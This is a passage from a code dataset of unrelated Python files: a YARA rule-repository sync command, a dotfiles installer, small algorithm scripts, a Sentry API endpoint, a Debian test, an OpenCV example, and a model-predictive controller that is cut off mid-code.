repo.head.object.hexsha\n head_name = [x.name for x in repo.heads][0]\n origin.fetch()\n changed = origin.refs[head_name].object.hexsha != current_hash\n if changed:\n diff = repo.head.commit.diff(origin.refs[head_name].object.hexsha)\n origin.pull()\n for cht in diff.change_type:\n changes = list(diff.iter_change_type(cht))\n if len(changes) == 0:\n continue\n\n # if file deleted, remove rule\n if cht in (\"D\"):\n for change in changes:\n if (\n Path(change.b_path).suffix.lower()\n in settings.YARA_EXT\n ):\n rule = Rule.objects.get(\n path=\"{}/{}\".format(repo_local, change.a_path)\n )\n rule.delete()\n self.stdout.write(\n self.style.ERROR(\n \"\\tRule {} has been deleted\".format(\n change.b_path\n )\n )\n )\n\n # if changed update [rename generate also a M event]\n elif cht in (\"M\"):\n for change in changes:\n if (\n Path(change.b_path).suffix.lower()\n in settings.YARA_EXT\n ):\n old_path = \"{}/{}\".format(repo_local, change.a_path)\n new_path = \"{}/{}\".format(repo_local, change.b_path)\n rule = Rule.objects.get(path=old_path)\n rule.path = new_path\n rule.save()\n self.stdout.write(\n self.style.ERROR(\n \"\\tRule {} has been updated\".format(\n old_path\n )\n )\n )\n\n # if new add to test list\n elif cht in (\"A\", \"C\"):\n for change in changes:\n if (\n Path(change.b_path).suffix.lower()\n in settings.YARA_EXT\n ):\n path = \"{}/{}\".format(repo_local, change.b_path)\n self.updated_rules.append((path, ruleset.pk))\n\n self.stdout.write(\"\\tRepo {} pulled\".format(ruleset.url))\n except (git.exc.GitCommandError, git.exc.NoSuchPathError) as e:\n self.stdout.write(self.style.ERROR(\"\\tERROR: {}\".format(e)))\n ruleset.enabled = False\n ruleset.save()\n\n def parse_awesome(self):\n \"\"\"\n Sync rulesets list from awesome-yara rule\n \"\"\"\n r = requests.get(settings.AWESOME_PATH)\n soup = BeautifulSoup(marko.convert(r.text), features=\"html.parser\")\n rulesets_a = soup.h2.nextSibling.nextSibling.find_all(\"a\")\n rulesets = []\n for ruleset in rulesets_a:\n link = ruleset[\"href\"].split(\"/tree/\")[0]\n name = ruleset.contents[0]\n try:\n description = BeautifulSoup(\n ruleset.nextSibling.li.text, \"html.parser\"\n ).text\n except AttributeError:\n try:\n description = BeautifulSoup(\n ruleset.nextSibling.nextSibling.li.text, \"html.parser\"\n ).text\n except AttributeError:\n description = None\n if link.startswith(\"https://github.com/\"):\n rulesets.append((link, name, description))\n\n # UPDATE MANUAL ADDED REPO\n other_rulesets = Ruleset.objects.filter(\n user__isnull=True, enabled=True\n ).exclude(url__in=[x[0] for x in rulesets])\n for ruleset in other_rulesets:\n rulesets.append((ruleset.url, ruleset.name, ruleset.description))\n\n self.stdout.write(self.style.SUCCESS(\"Found {} repo\".format(len(rulesets))))\n\n with transaction.atomic():\n pool = ThreadPool(settings.THREAD_NO)\n _ = pool.map(self.down_repo, rulesets)\n pool.close()\n\n self.stdout.write(\"DONE\")\n\n def add_yara(self):\n \"\"\"\n Get all yara rules in rulesets\n \"\"\"\n self.stdout.write(self.style.SUCCESS(\"Updating Rules\"))\n self.stdout.write(\"\\t{} rules to test!\".format(len(self.updated_rules)))\n with transaction.atomic():\n pool = ThreadPool(settings.THREAD_NO)\n _ = pool.map(self.compile_rule, self.updated_rules)\n pool.close()\n self.stdout.write(\"DONE\")\n\n def custom_rulesets(self):\n \"\"\"\n ADD CUSTOM RULESET TO ALL OLD USERS\n \"\"\"\n for user in get_user_model().objects.all():\n _, created = Ruleset.objects.get_or_create(\n user=user,\n name=\"{}-Ruleset\".format(user.username),\n description=\"Your crafted ruleset\",\n )\n if created:\n self.stdout.write(\n self.style.SUCCESS(\"Ruleset added to {}!\".format(user))\n )\n\n def handle(self, *args, **kwargs):\n self.parse_awesome()\n self.add_yara()\n self.custom_rulesets()\n self.stdout.write(self.style.SUCCESS(\"Operation completed\"))\n","sub_path":"orochi/ya/management/commands/rules_sync.py","file_name":"rules_sync.py","file_ext":"py","file_size_in_byte":8976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"557440955","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport subprocess\nimport os\n\nDOTFILES_DIR = os.path.expanduser('~/dotfiles/')\n\nSYMLINKS = (\n ('.aliases', '~/.aliases'),\n # Zsh\n ('.zshrc', '~/.zshrc'),\n # Shell bits\n ('.path', '~/.path'),\n ('.inputrc', '~/.inputrc'),\n ('.hushlogin', '~/.hushlogin'),\n # Ag - silver searcher.\n ('.agignore', '~/.agignore'),\n # Git\n ('.gitconfig', '~/.gitconfig'),\n ('.gitignore_', '~/.gitignore'),\n ('.git_commit_msg.txt', '~/.git_commit_msg.txt'),\n)\n\n\nPOST_COMMANDS = (\n # Install zgen\n 'git clone https://github.com/tarjoilija/zgen.git \"${HOME}/.zgen\"',\n)\n\n\ndef underline(title):\n \"\"\" Underlines a string \"\"\"\n return \"{0}\\n{1}\\n\".format(title, len(title) * '=')\n\n\ndef install_dotfiles():\n print(underline('Creating symlinks'))\n for orig_loc, symlink in SYMLINKS:\n symlink = os.path.expanduser(symlink)\n symlink_dir = os.path.dirname(symlink)\n if not os.path.exists(symlink_dir):\n os.makedirs(symlink_dir)\n orig_loc = '{}{}'.format(DOTFILES_DIR, orig_loc)\n create_symlink(orig_loc, symlink)\n print (\"\")\n\n\ndef create_symlink(orig_loc, symlink):\n print('Symlink: {}'.format(symlink))\n if os.path.exists(symlink):\n print('✘ Failed: path exists.')\n return\n os.symlink(orig_loc, symlink)\n print ('✔ Created.')\n\n\ndef run_post_install_commands():\n print(underline('Running install commands'))\n for command in POST_COMMANDS:\n print('Running: {}'.format(command))\n subprocess.call(command, shell=True)\n return\n\n\nif __name__ == \"__main__\":\n print('')\n install_dotfiles()\n run_post_install_commands()\n print('\\nDone!')\n","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"256384394","text":"num=11\nsum=0 \ncount=0 \nL=[]\nx=\" \"\nwhile num>0:\n rem=num%2\n L.append(rem)\n num=num//2\n count=count+1\n \nfor i in range(len(L)-1, -1, -1):\n x=x+str(L[i])\nprint(int(x))\n","sub_path":"Basics/Looping/Relevant_Programs/Decimal-to-Binary.py","file_name":"Decimal-to-Binary.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"19604668","text":"from rest_framework import status\nfrom rest_framework.request import Request\nfrom rest_framework.response import Response\n\nfrom sentry import audit_log\nfrom sentry.api.base import region_silo_endpoint\nfrom sentry.api.bases.rule import RuleEndpoint\nfrom sentry.api.serializers import serialize\nfrom sentry.api.serializers.models.rule import RuleSerializer\nfrom sentry.api.serializers.rest_framework.rule import RuleSerializer as DrfRuleSerializer\nfrom sentry.integrations.slack.utils import RedisRuleStatus\nfrom sentry.mediators import project_rules\nfrom sentry.models import (\n RuleActivity,\n RuleActivityType,\n RuleStatus,\n SentryAppComponent,\n SentryAppInstallation,\n Team,\n User,\n)\nfrom sentry.rules.actions import trigger_sentry_app_action_creators_for_issues\nfrom sentry.signals import alert_rule_edited\nfrom sentry.tasks.integrations.slack import find_channel_id_for_rule\nfrom sentry.utils import metrics\nfrom sentry.web.decorators import transaction_start\n\n\n@region_silo_endpoint\nclass ProjectRuleDetailsEndpoint(RuleEndpoint):\n @transaction_start(\"ProjectRuleDetailsEndpoint\")\n def get(self, request: Request, project, rule) -> Response:\n \"\"\"\n Retrieve a rule\n\n Return details on an individual rule.\n\n {method} {path}\n\n \"\"\"\n\n # Serialize Rule object\n serialized_rule = serialize(\n rule, request.user, RuleSerializer(request.GET.getlist(\"expand\", []))\n )\n\n errors = []\n # Prepare Rule Actions that are SentryApp components using the meta fields\n for action in serialized_rule.get(\"actions\", []):\n if action.get(\"_sentry_app_installation\") and action.get(\"_sentry_app_component\"):\n installation = SentryAppInstallation(**action.get(\"_sentry_app_installation\", {}))\n component = installation.prepare_ui_component(\n SentryAppComponent(**action.get(\"_sentry_app_component\")),\n project,\n action.get(\"settings\"),\n )\n if component is None:\n errors.append(\n {\"detail\": f\"Could not fetch details from {installation.sentry_app.name}\"}\n )\n action[\"disabled\"] = True\n continue\n\n action[\"formFields\"] = component.schema.get(\"settings\", {})\n\n # Delete meta fields\n del action[\"_sentry_app_installation\"]\n del action[\"_sentry_app_component\"]\n\n # TODO(nisanthan): This is a temporary fix. We need to save both the label and value of the selected choice and not save all the choices.\n if action.get(\"id\") == \"sentry.integrations.jira.notify_action.JiraCreateTicketAction\":\n for field in action.get(\"dynamic_form_fields\", []):\n if field.get(\"choices\"):\n field[\"choices\"] = [\n p\n for p in field.get(\"choices\", [])\n if isinstance(p[0], str) and isinstance(p[1], str)\n ]\n\n if len(errors):\n serialized_rule[\"errors\"] = errors\n\n return Response(serialized_rule)\n\n @transaction_start(\"ProjectRuleDetailsEndpoint\")\n def put(self, request: Request, project, rule) -> Response:\n \"\"\"\n Update a rule\n\n Update various attributes for the given rule.\n\n {method} {path}\n {{\n \"name\": \"My rule name\",\n \"conditions\": [],\n \"filters\": [],\n \"actions\": [],\n \"actionMatch\": \"all\",\n \"filterMatch\": \"all\"\n }}\n\n \"\"\"\n serializer = DrfRuleSerializer(\n context={\"project\": project, \"organization\": project.organization},\n data=request.data,\n partial=True,\n )\n\n if serializer.is_valid():\n data = serializer.validated_data\n\n # combine filters and conditions into one conditions criteria for the rule object\n conditions = data.get(\"conditions\", [])\n if \"filters\" in data:\n conditions.extend(data[\"filters\"])\n\n kwargs = {\n \"name\": data[\"name\"],\n \"environment\": data.get(\"environment\"),\n \"project\": project,\n \"action_match\": data[\"actionMatch\"],\n \"filter_match\": data.get(\"filterMatch\"),\n \"conditions\": conditions,\n \"actions\": data[\"actions\"],\n \"frequency\": data.get(\"frequency\"),\n }\n owner = data.get(\"owner\")\n if owner:\n try:\n kwargs[\"owner\"] = owner.resolve_to_actor().id\n except (User.DoesNotExist, Team.DoesNotExist):\n return Response(\n \"Could not resolve owner\",\n status=status.HTTP_400_BAD_REQUEST,\n )\n\n if data.get(\"pending_save\"):\n client = RedisRuleStatus()\n kwargs.update({\"uuid\": client.uuid, \"rule_id\": rule.id})\n find_channel_id_for_rule.apply_async(kwargs=kwargs)\n\n context = {\"uuid\": client.uuid}\n return Response(context, status=202)\n\n trigger_sentry_app_action_creators_for_issues(kwargs.get(\"actions\"))\n\n if rule.data[\"conditions\"] != kwargs[\"conditions\"]:\n metrics.incr(\"sentry.issue_alert.conditions.edited\", sample_rate=1.0)\n updated_rule = project_rules.Updater.run(rule=rule, request=request, **kwargs)\n\n RuleActivity.objects.create(\n rule=updated_rule, user=request.user, type=RuleActivityType.UPDATED.value\n )\n self.create_audit_entry(\n request=request,\n organization=project.organization,\n target_object=updated_rule.id,\n event=audit_log.get_event_id(\"RULE_EDIT\"),\n data=updated_rule.get_audit_log_data(),\n )\n alert_rule_edited.send_robust(\n user=request.user,\n project=project,\n rule=rule,\n rule_type=\"issue\",\n sender=self,\n is_api_token=request.auth is not None,\n )\n\n return Response(serialize(updated_rule, request.user))\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n @transaction_start(\"ProjectRuleDetailsEndpoint\")\n def delete(self, request: Request, project, rule) -> Response:\n \"\"\"\n Delete a rule\n \"\"\"\n rule.update(status=RuleStatus.PENDING_DELETION)\n RuleActivity.objects.create(\n rule=rule, user=request.user, type=RuleActivityType.DELETED.value\n )\n self.create_audit_entry(\n request=request,\n organization=project.organization,\n target_object=rule.id,\n event=audit_log.get_event_id(\"RULE_REMOVE\"),\n data=rule.get_audit_log_data(),\n )\n return Response(status=202)\n","sub_path":"src/sentry/api/endpoints/project_rule_details.py","file_name":"project_rule_details.py","file_ext":"py","file_size_in_byte":7186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"151132283","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/flanker/Developer/Github/DebTools/debtools/tests/tests_utils.py\n# Compiled at: 2015-07-27 09:11:29\nfrom __future__ import unicode_literals\nfrom unittest import TestCase\nimport pkg_resources\nfrom debtools.utils import get_control_data\n__author__ = b'Matthieu Gallet'\n\nclass TestGetControlData(TestCase):\n\n @property\n def filename(self):\n return pkg_resources.resource_filename(b'debtools.tests', b'python-debtools_0.3-1_all.deb')\n\n def test_get_control_data(self):\n data = get_control_data(self.filename)\n self.assertEqual({b'Maintainer': b'Matthieu Gallet ', \n b'Description': b'Utilities for creating mutliple Debian packages.\\nDebTools\\n========', \n b'Package': b'python-debtools', \n b'Section': b'python', \n b'Depends': b'python (>= 2.7), python (<< 2.8), python-stdeb, python-backports.lzma', \n b'Priority': b'optional', \n b'Source': b'debtools', \n b'Installed-Size': b'88', \n b'Version': b'0.3-1', \n b'Architecture': b'all'}, data)","sub_path":"pycfiles/debtools-0.7.4.tar/tests_utils.py","file_name":"tests_utils.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"559046416","text":"# topics = [\"数组\"]\n\nfrom typing import List\n\n\nclass Solution:\n def nextPermutation(self, nums: List[int]) -> None:\n \"\"\"\n 两次遍历\n time O(n), space O(1), n 为数组长度\n \"\"\"\n n = len(nums)\n has_next = False\n\n # 从后往前遍历,找到第一个 i, 存在 nums[i] < nums[j], j 在 [i + 1, n - 1] 区间,且尽量靠右(即尽量小)\n i = n - 1\n while i >= 0:\n j = n - 1\n while j > i:\n if nums[j] > nums[i]:\n has_next = True\n break\n j -= 1\n if has_next is True:\n nums[i], nums[j] = nums[j], nums[i]\n break\n i -= 1\n\n # 反转 [start, end]\n start = i + 1\n end = n - 1\n while start < end:\n nums[start], nums[end] = nums[end], nums[start]\n start += 1\n end -= 1\n","sub_path":"algorithms/[31]下一个排列/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"539412715","text":"import cv2\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndef main():\r\n \r\n source = \"C:\\\\Users\\\\Srikanth\\\\Desktop\\\\Python\\\\Opencv\\\\Dataset\\\\\"\r\n \r\n imgpath1 = source + \"4.2.01.tiff\"\r\n \r\n img = cv2.imread(imgpath1,1)\r\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\r\n \r\n rows, columns, channels = img.shape\r\n \r\n T = np.float32([[1,0,-50],[0,1,-50]])\r\n \r\n print(T)\r\n \r\n output = cv2.warpAffine(img,T, (columns,rows))\r\n \r\n plt.imshow(output)\r\n plt.title(\"Shifted image\")\r\n plt.show()\r\n \r\nif __name__ == '__main__':\r\n main()","sub_path":"Transformations using Opencv2/6.Shifting an image1.py","file_name":"6.Shifting an image1.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"99357848","text":"import time\nimport os\nimport numpy as np\nimport osqp\nfrom scipy import sparse\nimport importlib\nfrom numba import njit\n\nfrom core.controllers.controller import Controller\nfrom koopman_core.dynamics import BilinearLiftedDynamics\n\n\n@njit(fastmath=True, cache=True)\ndef _update_objective(C_obj, Q, QN, R, R0, xr, z_init, u_init, const_offset, u_prev, N, nx, nu):\n \"\"\"\n Construct MPC objective function\n :return:\n \"\"\"\n res = np.hstack(\n ((C_obj.T @ Q @ (C_obj @ z_init[:, :-1] - xr[:, :-1])).T.flatten(),\n C_obj.T @ QN @ (C_obj @ z_init[:, -1] - xr[:, -1]),\n (R @ (u_init + const_offset)).T.flatten()))\n\n # Jitter regularization linear objective:\n res[(N+1)*nx:(N+1)*nx + nu] -= R0 @ u_prev\n return res\n\n@njit(fastmath=True, cache=True)\ndef _update_constraint_vecs(osqp_l, osqp_u, z, z_init, x_init_flat, xr, xmin_tiled, xmax_tiled,\n u_init_flat, umin_tiled, umax_tiled, r_vec, nx, ns, N, n_opt_x, n_opt_x_u, terminal_constraint):\n # Equality constraints:\n osqp_l[:nx] = -(z - z_init[0, :])\n osqp_l[nx:nx * (N + 1)] = -r_vec\n\n osqp_u[:nx * (N + 1)] = osqp_l[:nx * (N + 1)]\n\n # Input constraints:\n osqp_l[n_opt_x:n_opt_x_u] = umin_tiled - u_init_flat\n osqp_u[n_opt_x:n_opt_x_u] = umax_tiled - u_init_flat\n\n # State constraints:\n osqp_l[n_opt_x_u:] = xmin_tiled - x_init_flat\n osqp_u[n_opt_x_u:] = xmax_tiled - x_init_flat\n\n if terminal_constraint:\n osqp_l[-ns:] = xr - x_init_flat[-ns:]\n osqp_u[-ns:] = osqp_l[-ns:]\n\n return osqp_l, osqp_u\n\n@njit(fastmath=True, cache=True)\ndef _update_current_sol(z_init, dz_flat, u_init, du_flat, u_init_flat, nx, nu, N):\n cur_z = z_init + dz_flat.reshape(N + 1, nx).T\n cur_u = u_init + du_flat.reshape(N, nu).T\n u_init_flat = u_init_flat + du_flat\n\n return cur_z, cur_u, u_init_flat\n\nclass NMPCTrajControllerNb(Controller):\n \"\"\"\n Class for nonlinear MPC with control-affine dynamics.\n\n Quadratic programs are solved using OSQP.\n \"\"\"\n\n def __init__(self, dynamics, N, dt, umin, umax, xmin, xmax, C_x, C_obj, Q, R, QN, R0, xr, solver_settings, const_offset=None,\n terminal_constraint=False, add_slack=False, q_slack=1e3):\n \"\"\"\n Initialize the nonlinear mpc class.\n :param dynamics: (AffindeDynamics) dynamics object describing system dynamics\n :param N: (int) Prediction horizon in number of timesteps\n :param dt: (float) Time interval between time steps\n :param umin: (np.array) Actuation lower bounds\n :param umax: (np.array) Actuation upper bounds\n :param xmin: (np.array) State lower bounds\n :param xmax: (np.array) State upper bounds\n :param Q: (sparse.csc_matrix) State deviation penalty matrix\n :param R: (sparse.csc_matrix) Actuation penalty matrix\n :param QN: (sparse.csc_matrix) Terminal state deviation penalty matrix\n :param xr: (np.array) Desired state, setpoint\n :param const_offset: (np.array) Constant offset of the control inputs\n :param terminal_constraint: (boolean) Constrain terminal state to be xr\n :param add_slack: (boolean) Add slack variables to state constraints\n :param q_slack: (float) Penalty value of slack terms q||s||^2, where s are the slack variables\n \"\"\"\n\n Controller.__init__(self, dynamics)\n\n self.dynamics_object = dynamics\n self.nx = self.dynamics_object.n\n self.nu = self.dynamics_object.m\n self.dt = dt\n self.C_x = C_x\n self.C_obj = C_obj\n if not type(self.dynamics_object) == BilinearLiftedDynamics:\n self.dynamics_object.lift = lambda x, t: x\n\n self.Q = Q\n self.QN = QN\n self.R = R\n self.R0 = R0\n self.N = N\n self.xmin = np.array(xmin)\n self.xmax = np.array(xmax)\n self.umin = np.array(umin)\n self.umax = np.array(umax)\n\n if self.dynamics_object.standardizer_u is not None:\n self.const_offset = self.dynamics_object.standardizer_u.mean_.reshape(-1, 1)\n self.umin = self.dynamics_object.standardizer_u.transform(self.umin.reshape(1,-1)).squeeze()\n self.umax = self.dynamics_object.standardizer_u.transform(self.umax.reshape(1,-1)).squeeze()\n elif const_offset is None:\n self.const_offset = np.zeros((self.nu, 1))\n else:\n self.const_offset = const_offset\n\n self.xr = xr\n self.ns = self.C_x.shape[0]\n if self.xr.ndim==2:\n # Add copies of the final state in the desired trajectory to enable prediction beyond trajectory horizon:\n if self.xr.shape[0] == self.ns:\n xr_tail = np.vstack((np.tile(self.xr[:int(self.ns/2), -1], (self.N + 1, 1)).T, np.zeros((int(self.ns/2), self.N+1))))\n else:\n xr_tail = np.tile(self.xr[:, -1], (self.N + 1, 1)).T\n self.xr = np.hstack((self.xr, xr_tail))\n self.terminal_constraint = terminal_constraint\n\n self.add_slack = add_slack\n self.Q_slack = q_slack * sparse.eye(self.ns * (self.N))\n\n self.solver_settings = solver_settings\n self.embed_pkg_str = 'nmpc_' + str(self.nx) + '_' + str(self.nu) + '_' + str(self.N)\n\n self.prep_time = []\n self.qp_time = []\n self.comp_time = []\n self.x_iter = []\n self.u_iter = []\n\n self.sub_traj = []\n\n # Define dense copies of problem matrices for numba implementation:\n self.C_x_dense = self.C_x.toarray().astype(float)\n self.C_obj_dense = self.C_obj.toarray().astype(float)\n self.Q_dense = self.Q.toarray()\n self.QN_dense = self.QN.toarray()\n self.R_dense = self.R.toarray()\n self.R0_dense = self.R0.toarray()\n self.const_offset_dense = np.tile(self.const_offset, (1, self.N))\n\n def construct_controller(self, z_init, u_init):\n \"\"\"\n Construct NMPC controller.\n :param z_init: (np.array) Initial guess of z-solution\n :param u_init: (np.array) Initial guess of u-solution\n :return:\n \"\"\"\n\n z0 = z_init[:, 0]\n self.z_init = z_init\n self.u_init = u_init\n self.cur_z = z_init\n self.cur_u = u_init\n self.x_init = self.C_x_dense @ z_init\n self.u_init_flat = self.u_init.flatten(order='F')\n self.x_init_flat = self.x_init.flatten(order='F')\n self.dz_flat = self.z_init.flatten(order='F')\n self.du_flat = self.u_init.flatten(order='F')\n\n #self.warm_start = np.zeros(self.nx*(self.N+1) + self.nu*self.N)\n\n A_lst = [np.ones((self.nx, self.nx)) for _ in range(self.N)]\n B_lst = [np.ones((self.nx, self.nu)) for _ in range(self.N)]\n self.A_stacked = np.hstack(A_lst).flatten(order='F')\n self.B_stacked = np.hstack(B_lst).flatten(order='F')\n self.r_vec = np.array([np.ones(self.nx) for _ in range(self.N)]).flatten()\n\n self.construct_objective_()\n self.construct_constraint_vecs_(z0, None)\n self.construct_constraint_matrix_(A_lst, B_lst)\n self.construct_constraint_matrix_data_(A_lst, B_lst)\n\n # Create an OSQP object and setup workspace\n self.prob = osqp.OSQP()\n self.prob.setup(P=self._osqp_P, q=self._osqp_q, A=self._osqp_A, l=self._osqp_l, u=self._osqp_u, verbose=False,\n max_iter=self.solver_settings['max_iter'],\n warm_start=self.solver_settings['warm_start'],\n polish=self.solver_settings['polish'],\n polish_refine_iter=self.solver_settings['polish_refine_iter'],\n check_termination=self.solver_settings['check_termination'],\n eps_abs=self.solver_settings['eps_abs'],\n eps_rel=self.solver_settings['eps_rel'],\n eps_prim_inf=self.solver_settings['eps_prim_inf'],\n eps_dual_inf=self.solver_settings['eps_dual_inf'],\n linsys_solver=self.solver_settings['linsys_solver'],\n adaptive_rho=self.solver_settings['adaptive_rho'])\n\n if self.solver_settings['gen_embedded_ctrl']:\n self.construct_embedded_controller()\n\n def update_solver_settings(self, solver_settings):\n \"\"\"\n Update the OSQP solver settings (see OSQP documentation for detailed description of each setting)\n :param warm_start: (boolean) Warm start the solver with solution from previous timestep\n :param check_termination: (int) Frequency of checking whether the solution has converged (number of iterations)\n :param max_iter: (int) Maximum iterations allowed by the solver\n :param polish: (boolean) Execute polish step at the end of solve\n :param linsys_solver: (string) Which linear system solver to use as part of OSQP algorithm\n :return:\n \"\"\"\n self.solver_settings = solver_settings\n self.prob.update_settings(warm_start=self.solver_settings['warm_start'],\n polish=self.solver_settings['polish'],\n polish_refine_iter=self.solver_settings['polish_refine_iter'],\n check_termination=self.solver_settings['check_termination'],\n eps_abs=self.solver_settings['eps_abs'],\n eps_rel=self.solver_settings['eps_rel'],\n eps_prim_inf=self.solver_settings['eps_prim_inf'],\n eps_dual_inf=self.solver_settings['eps_dual_inf'],\n linsys_solver=self.solver_settings['linsys_solver'])\n\n def solve_to_convergence(self, z, t, z_init_0, u_init_0, eps=1e-3, max_iter=1, min_iter=10):\n \"\"\"\n Run SQP-algorithm to convergence\n :param z: (np.array) Initial value of z\n :param t: (float) Initial value of t (for time-dependent dynamics)\n :param z_init_0: (np.array) Initial guess of z-solution\n :param u_init_0: (np.array) Initial guess of u-solution\n :param eps: (float) Stop criterion, normed difference of the control input sequence\n :param max_iter: (int) Maximum SQP-iterations to run\n :return:\n \"\"\"\n iter = 0\n self.cur_z = z_init_0\n self.cur_u = u_init_0\n u_prev = np.zeros_like(u_init_0)\n\n from matplotlib import pyplot as plt\n plt.figure()\n while (iter < min_iter or np.linalg.norm(u_prev - self.cur_u) / np.linalg.norm(u_prev) > eps) and iter < max_iter:\n t0 = time.time()\n u_prev = self.cur_u.copy()\n self.z_init = self.cur_z.copy()\n self.x_init = (self.C_x_dense @ self.z_init)\n self.u_init = self.cur_u.copy()\n\n # Update equality constraint matrices:\n #A_lst, B_lst = self.update_linearization_()\n self.update_linearization_()\n\n # Solve MPC Instance\n self.update_objective_(t)\n self.construct_constraint_vecs_(z, None)\n #self.update_constraint_matrix_data_(A_lst, B_lst)\n self.update_constraint_matrix_data_()\n t_prep = time.time() - t0\n\n self.solve_mpc_()\n dz = self.dz_flat.reshape(self.nx, self.N + 1, order='F')\n du = self.du_flat.reshape(self.nu, self.N, order='F')\n\n #alpha = min(1., iter/min_iter + 1/min_iter)\n alpha = 1.\n #print(alpha)\n self.cur_z = self.z_init + alpha * dz\n self.cur_u = self.u_init + alpha * du\n self.u_init_flat = self.u_init_flat + alpha * self.du_flat\n\n #plt.plot(self.cur_z[0, :], self.cur_z[2,:], label=str(iter))\n #plt.show()\n iter += 1\n self.comp_time.append(time.time() - t0)\n self.prep_time.append(t_prep)\n self.qp_time.append(self.comp_time[-1] - t_prep)\n self.x_iter.append(self.cur_z.copy().T)\n self.u_iter.append(self.cur_u.copy().T)\n\n #print(iter, alpha, np.linalg.norm(u_prev - self.cur_u) / np.linalg.norm(u_prev))\n\n def eval(self, x, t):\n \"\"\"\n Run single iteration of SQP-algorithm to get control signal in closed-loop control\n :param x: (np.array) Current state\n :param t: (float) Current time (for time-dependent dynamics)\n :return: u: (np.array) Current control input\n \"\"\"\n t0 = time.time()\n z = self.dynamics_object.lift(x.reshape((1, -1)), None).squeeze()\n self.update_constraint_vecs_(z, t)\n\n self.solve_mpc_()\n self.cur_z, self.cur_u, self.u_init_flat = _update_current_sol(self.z_init, self.dz_flat, self.u_init,\n self.du_flat, self.u_init_flat, self.nx, self.nu,\n self.N)\n self.comp_time.append(time.time() - t0)\n\n if self.dynamics_object.standardizer_u is None:\n return self.cur_u[:, 0]\n else:\n return self.dynamics_object.standardizer_u.inverse_transform(self.cur_u[:, 0])\n\n def prepare_eval(self, t, update_initial_guess=True):\n t0 = time.time()\n if update_initial_guess:\n self.update_initial_guess_()\n self.update_objective_(t)\n self.update_linearization_()\n self.update_constraint_matrix_data_()\n #self.prob.warm_start(x=self.warm_start)\n self.prep_time.append(time.time() - t0)\n\n def construct_objective_(self):\n \"\"\"\n Construct MPC objective function\n :return:\n \"\"\"\n # Quadratic objective:\n if not self.add_slack:\n self._osqp_P = sparse.block_diag([sparse.kron(sparse.eye(self.N), self.C_obj.T @ self.Q @ self.C_obj),\n self.C_obj.T @ self.QN @ self.C_obj,\n sparse.kron(sparse.eye(self.N), self.R)], format='csc')\n\n else:\n self._osqp_P = sparse.block_diag([sparse.kron(sparse.eye(self.N), self.C_obj.T @ self.Q @ self.C_obj),\n self.C_obj.T @ self.QN @ self.C_obj,\n sparse.kron(sparse.eye(self.N), self.R),\n self.Q_slack], format='csc')\n\n # Jitter regularization quadratic objective:\n ind_start_control = (self.N+1)*self.nx\n self._osqp_P[ind_start_control:ind_start_control+self.nu, ind_start_control:ind_start_control+self.nu] += 0.5*self.R0\n\n # Linear objective:\n if self.xr.ndim==2:\n xr = self.xr[:,:self.N + 1]\n else:\n xr = self.xr.reshape(-1, 1)\n\n if not self.add_slack:\n self._osqp_q = np.hstack(\n [(self.C_obj.T @ self.Q @ (self.C_obj @ self.z_init[:, :-1] - xr[:, :-1])).flatten(order='F'),\n self.C_obj.T @ self.QN @ (self.C_obj @ self.z_init[:, -1] - xr[:, -1]),\n (self.R @ (self.u_init + self.const_offset)).flatten(order='F')])\n\n else:\n self._osqp_q = np.hstack(\n [(self.C_obj.T @ self.Q @ (self.C_obj @ self.z_init[:, :-1] - xr[:, :-1])).flatten(order='F'),\n self.C_obj.T @ self.QN @ (self.C_obj @ self.z_init[:, -1] - xr[:, -1]),\n (self.R @ (self.u_init + self.const_offset)).flatten(order='F'),\n np.zeros(self.ns * (self.N))])\n\n # Jitter regularization linear objective:\n self._osqp_q[ind_start_control:ind_start_control+self.nu] -= self.R0 @ self.cur_u[:, 0]\n\n def update_objective_(self, t):\n \"\"\"\n Construct MPC objective function\n :return:\n \"\"\"\n tindex = int(t/self.dt)\n xr = self.xr[:, tindex:tindex+self.N+1]\n\n self._osqp_q[:self.nx * (self.N + 1) + self.nu * self.N] = \\\n _update_objective(self.C_obj_dense, self.Q_dense, self.QN_dense, self.R_dense, self.R0_dense, xr, self.z_init, self.u_init,\n self.const_offset_dense, self.cur_u[:, 0], self.N, self.nx, self.nu)\n\n def construct_constraint_matrix_(self, A_lst, B_lst):\n \"\"\"\n Construct MPC constraint matrix\n :param A_lst: (list(np.array)) List of dynamics matrices, A, for each timestep in the prediction horizon\n :param B_lst: (list(np.array)) List of dynamics matrices, B, for each timestep in the prediction horizon\n :return:\n \"\"\"\n\n # Linear dynamics constraints:\n A_dyn = sparse.vstack((sparse.csc_matrix((self.nx, (self.N + 1) * self.nx)),\n sparse.hstack((\n sparse.block_diag(A_lst), sparse.csc_matrix((self.N * self.nx, self.nx))))))\n Ax = -sparse.eye((self.N + 1) * self.nx) + A_dyn\n Bu = sparse.vstack((sparse.csc_matrix((self.nx, self.N * self.nu)),\n sparse.block_diag(B_lst)))\n\n if not self.add_slack:\n # Input constraints:\n Aineq_u = sparse.hstack(\n [sparse.csc_matrix((self.N * self.nu, (self.N + 1) * self.nx)),\n sparse.eye(self.N * self.nu)])\n\n # State constraints:\n Aineq_x = 